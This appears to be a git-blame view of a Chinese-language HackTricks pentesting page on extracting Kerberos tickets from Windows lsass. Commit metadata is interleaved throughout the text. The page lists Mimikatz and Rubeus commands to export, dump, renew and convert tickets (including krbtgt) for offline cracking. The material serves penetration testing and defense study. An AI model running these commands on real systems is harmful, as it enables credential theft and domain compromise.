Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-25 06:00:40 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md

65 lines
3.8 KiB
Markdown
Raw Normal View History

Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:11:43 +00:00
# 从Windows中提取票证
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:11:43 +00:00
{% hint style="success" %}
学习与实践AWS黑客技术<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家ARTE**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践GCP黑客技术<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家GRTE**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:11:43 +00:00
<details>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:11:43 +00:00
<summary>支持HackTricks</summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:11:43 +00:00
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**Telegram群组**](https://t.me/peass)或**关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub库提交PR分享黑客技巧。
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:11:43 +00:00
{% endhint %}
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:11:43 +00:00
Windows中的票证由**lsass**本地安全授权子系统服务进程管理和存储该进程负责处理安全策略。要提取这些票证必须与lsass进程进行交互。非管理员用户只能访问自己的票证而管理员则有权提取系统上的所有票证。对于此类操作工具**Mimikatz**和**Rubeus**被广泛使用,每种工具提供不同的命令和功能。
Translated ['forensics/basic-forensic-methodology/partitions-file-system
2024-02-05 02:56:36 +00:00
### Mimikatz
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:11:43 +00:00
Mimikatz是一个多功能工具可以与Windows安全进行交互。它不仅用于提取票证还用于各种其他与安全相关的操作。
GitBook: [#3372] No subject
2022-08-13 23:06:40 +00:00
```bash
Translated ['forensics/basic-forensic-methodology/partitions-file-system
2024-02-05 02:56:36 +00:00
# Extracting tickets using Mimikatz
GitBook: [#3372] No subject
2022-08-13 23:06:40 +00:00
sekurlsa::tickets /export
Translated ['forensics/basic-forensic-methodology/partitions-file-system
2024-02-05 02:56:36 +00:00
```
### Rubeus
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:11:43 +00:00
Rubeus 是一个专门为 Kerberos 交互和操作量身定制的工具。它用于票证提取和处理,以及其他与 Kerberos 相关的活动。
Translated ['forensics/basic-forensic-methodology/partitions-file-system
2024-02-05 02:56:36 +00:00
```bash
# Dumping all tickets using Rubeus
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
Translated ['forensics/basic-forensic-methodology/partitions-file-system
2024-02-05 02:56:36 +00:00
# Listing all tickets
GitBook: [#3372] No subject
2022-08-13 23:06:40 +00:00
.\Rubeus.exe triage
Translated ['forensics/basic-forensic-methodology/partitions-file-system
2024-02-05 02:56:36 +00:00
# Dumping a specific ticket by LUID
GitBook: [#3372] No subject
2022-08-13 23:06:40 +00:00
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['forensics/basic-forensic-methodology/partitions-file-system
2024-02-05 02:56:36 +00:00
# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['forensics/basic-forensic-methodology/partitions-file-system
2024-02-05 02:56:36 +00:00
# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:11:43 +00:00
在使用这些命令时,请确保将占位符如 `<BASE64_TICKET>``<luid>` 替换为实际的 Base64 编码票证和登录 ID。这些工具提供了广泛的功能用于管理票证和与 Windows 的安全机制进行交互。
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:11:43 +00:00
## 参考文献
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer
2024-02-08 22:20:49 +00:00
* [https://www.tarlogic.com/en/blog/how-to-attack-kerberos/](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:11:43 +00:00
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer
2024-02-08 22:20:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:11:43 +00:00
<details>
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer
2024-02-08 22:20:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:11:43 +00:00
<summary>支持 HackTricks</summary>
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer
2024-02-08 22:20:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:11:43 +00:00
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer
2024-02-08 22:20:49 +00:00
</details>
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:11:43 +00:00
{% endhint %}
Reference in a new issue Copy permalink